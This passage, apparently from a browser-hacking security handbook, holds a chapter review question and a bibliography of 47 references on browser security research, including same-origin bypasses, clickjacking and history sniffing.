10. Why is analyzing the Browser API important? Describe one of the attacks on the Avant or Maxton browser.

For answers to the questions please refer to the book’s website at https://browserhacker.com/answers or the Wiley website at: www.wiley.com/go/browserhackershandbook.

Notes

1. Oracle. (2009). URL class. Retrieved May 11, 2013 from http://docs.oracle.com/javase/6/docs/api/java/net/URL.html#equals(java.lang.Object)

2. Esteban Guillardoy. (2013). Keep calm and run this applet. Retrieved May 11, 2013 from http://immunityproducts.blogspot.co.uk/2013/02/keep-calm-and-run-this-applet.html

3. Oracle. (2013). What should I do when I see a security prompt from Java? Retrieved May 11, 2013 from https://www.java.com/en/download/help/appsecuritydialogs.xml

4. Will Dormann. (2012). Don’t sign that applet. Retrieved May 11, 2013 from http://www.cert.org/blogs/certcc/2013/04/dont_sign_that_applet.html

5. Mozilla. (2012). LiveConnect. Retrieved May 11, 2013 from https://developer.mozilla.org/en/docs/LiveConnect

6. Neal Poole. (2011). Java Applet SOP Bypass via HTTP Redirect. Retrieved May 11, 2013 from https://nealpoole.com/blog/2011/10/java-applet-same-origin-policy-bypass-via-http-redirect/

7. Frederik Braun. (2012). Origin Policy Enforcement in Modern Browsers. Retrieved from https://frederik-braun.com/publications/thesis/Thesis-Origin_Policy_Enforcement_in_Modern_Browsers.pdf

8. WebSense. (2013). How are Java attacks getting through. Retrieved August 4, 2013 from http://community.websense.com/blogs/securitylabs/archive/2013/03/25/how-are-java-attacks-getting-through.aspx

9. Bit9. (2013). Most enterprise networks riddled with vulnerable Java installations. Retrieved August 4, 2013 from http://www.networkworld.com/news/2013/071813-most-enterprise-networks-riddled-with-271939.html

10. Eric Romang. (2013). Oracle Java Exploits and 0 days Timeline. Retrieved August 4, 2013 from http://eromang.zataz.com/uploads/oracle-java-exploits-0days-timeline.html

11. CVEDetails. (2013). Adobe Acrobat Reader Vulnerability Statistics. Retrieved August 4, 2013 from http://www.cvedetails.com/product/497/Adobe-Acrobat-Reader.html?vendor_id=53

12. Adobe. (2005). Acrobat JavaScript Scripting Guide. Retrieved May 11, 2013 from http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf

13. Michal Zalewski. (2010). Same-origin policy for Silverlight. Retrieved May 11, 2013 from http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_Silverlight

14. Alex Kouzemtchenko. (2008). Same Origin Policy Weaknesses. Retrieved May 11, 2013 from http://powerofcommunity.net/poc2008/kuza55.pdf

15. 0x000000. (2008). Defeating The Same Origin Policy. Retrieved May 11, 2013 from http://mandark.fr/0x000000/articles/Defeating_The_Same_Origin_Policy..html

16. 0x000000. (2007). CVE-2007-3514. Retrieved May 11, 2013 from http://www.cvedetails.com/cve/CVE-2007-3514/

17. Gareth Heyes. (2012). Firefox knows what your friends did last summer. Retrieved May 11, 2013 from http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-your-friends-did-last-summer/

18. Michael Coates. (2012). Security Vulnerability in Firefox 16. Retrieved May 11, 2013 https://blog.mozilla.org/security/2012/10/10/security-vulnerability-in-firefox-16/

19. Opera Software. (2012). Opera 12.10 Changelog. Retrieved May 11, 2013 from http://www.opera.com/docs/changelogs/unified/1210/

20. Gareth Heyes. (2012). Advisory: Cross domain access to object constructors can be used to facilitate cross-site scripting. Retrieved May 11, 2013 from http://www.opera.com/support/kb/view/1032/

21. Gareth Heyes. (2012). Opera x-domain with video tutorial. Retrieved May 11, 2013 from http://www.thespanner.co.uk/2012/11/08/opera-x-domain-with-video-tutorial/

22. Roi Saltzman. (2012). DropBox Cross-zone Scripting. Retrieved May 11, 2013 from http://blog.watchfire.com/files/dropboxadvisory.pdf

23. Roi Saltzman. (2012). Google Drive Cross-zone Scripting. Retrieved May 11, 2013 from http://blog.watchfire.com/files/googledriveadvisory.pdf

24. Veracode. (2012). Security Headers on the Top 1,000,000 Websites. Retrieved May 11, 2013 from http://www.veracode.com/blog/2012/11/security-headers-report/

25. Anton Rager. (2002). Advanced Cross Site Scripting Evil XSS. Retrieved May 11, 2013 from http://xss-proxy.sourceforge.net/shmoocon-XSS-Proxy.ppt

26. Stefano Di Paola and Giorgio Fedon. (2006). Subverting Ajax. Retrieved May 11, 2013 from http://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf

27. Ferruh Mavituna. (2007). XSS Tunneling. Retrieved May 11, 2013 from http://labs.portcullis.co.uk/download/XSS-Tunnelling.pdf

28. Krzysztof Kotowicz. (2009). New Facebook clickjacking attack in the wild. Retrieved May 11, 2013 from http://blog.kotowicz.net/2009/12/new-facebook-clickjagging-attack-in.html

29. Jesse Ruderman. (2002). IFrame content background defaults to transparent. Retrieved May 11, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=154957

30. Robert Hansen and Jeremiah Grossman. (2008). Clickjacking. Retrieved May 11, 2013 from http://www.sectheory.com/clickjacking.htm

31. Rich Lundeen. (2012). BeEF Clickjacking Module and using the REST API to Automate Attacks. Retrieved May 11, 2013 from http://webstersprodigy.net/2012/12/06/beef-clickjacking-module-and-using-the-rest-api-to-automate-attacks/

32. Giorgio Maone. (2010). What is ClearClick and how does it protect me from Clickjacking? Retrieved May 11, 2013 from http://noscript.net/faq#qa7_4

33. Marcus Niemietz. (2012). Cursorjacking. Retrieved May 11, 2013 from http://www.mniemietz.de/demo/cursorjacking/cursorjacking.html

34. Krzysztof Kotowicz. (2012). Cursorjacking Again. Retrieved May 11, 2013 from http://blog.kotowicz.net/2012/01/cursorjacking-again.html

35. Sebastian Lekies, Mario Heiderich, Dennis Appelt, Thorsten Holz, and Martin Johns. (2012). On the fragility and limitations of current Browser-provided Clickjacking protection schemes. Retrieved May 11, 2013 fromhttp://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/clickjacking-woot12.pdf

36. Krzysztof Kotowicz. (2011). Filejacking: How to make a file server from your browser. Retrieved May 11, 2013 from http://blog.kotowicz.net/2011/04/how-to-make-file-server-from-your.html

37. Michal Zalewski. (2010). Drag-and-drop may be used to steal content across domains. Retrieved May 11, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=605991

38. Krzysztof Kotowicz. (2011). Cross domain content extraction with fake captcha. Retrieved May 11, 2013 from http://blog.kotowicz.net/2011/07/cross-domain-content-extraction-with.html

39. Zeljka Zorz. (2011). Facebook spammers trick users into sharing anti-CSRF tokens. Retrieved May 11, 2013 from http://www.net-security.org/secworld.php?id=11857

40. Luca De Fulgentis. (2012). UI Redressing Mayhem: Firefox 0day and the Leakedin Affair. Retrieved May 11, 2013 from http://blog.nibblesec.org/2012/12/ui-redressing-mayhem-firefox-0day-and.html

41. Andrew Clover. (2002). CSS visited pages disclosure. Retrieved May 11, 2013 from http://seclists.org/bugtraq/2002/Feb/271

42. Jeremiah Grossman. (2007). CSS History Hack. Retrieved May 11, 2013 from http://ha.ckers.org/weird/CSS-history-hack.html

43. David Baron. (2002). Bug 14777-:visited support allows queries into global history. Retrieved May 11, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=147777

44. Edward W. Felten and Michael A. Schneider. (2012). Timing Attacks on Web Privacy. Retrieved May 11, 2013 from http://selfsecurity.org/technotes/websec/webtiming.pdf

45. Michal Zalewski. (2012). Rapid history extraction through non-destructive cache timing. Retrieved May 11, 2013 from http://lcamtuf.coredump.cx/cachetime/

46. Mansour Behabadi. (2012). visipisi. Retrieved May 11, 2013 from http://oxplot.github.com/visipisi/visipisi.html

47. Roberto Suggi Liverani. (2012). Maxthon––Cross Context Scripting (XCS)––about:history––Remote Code Execution. Retrieved May 11, 2013 from http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html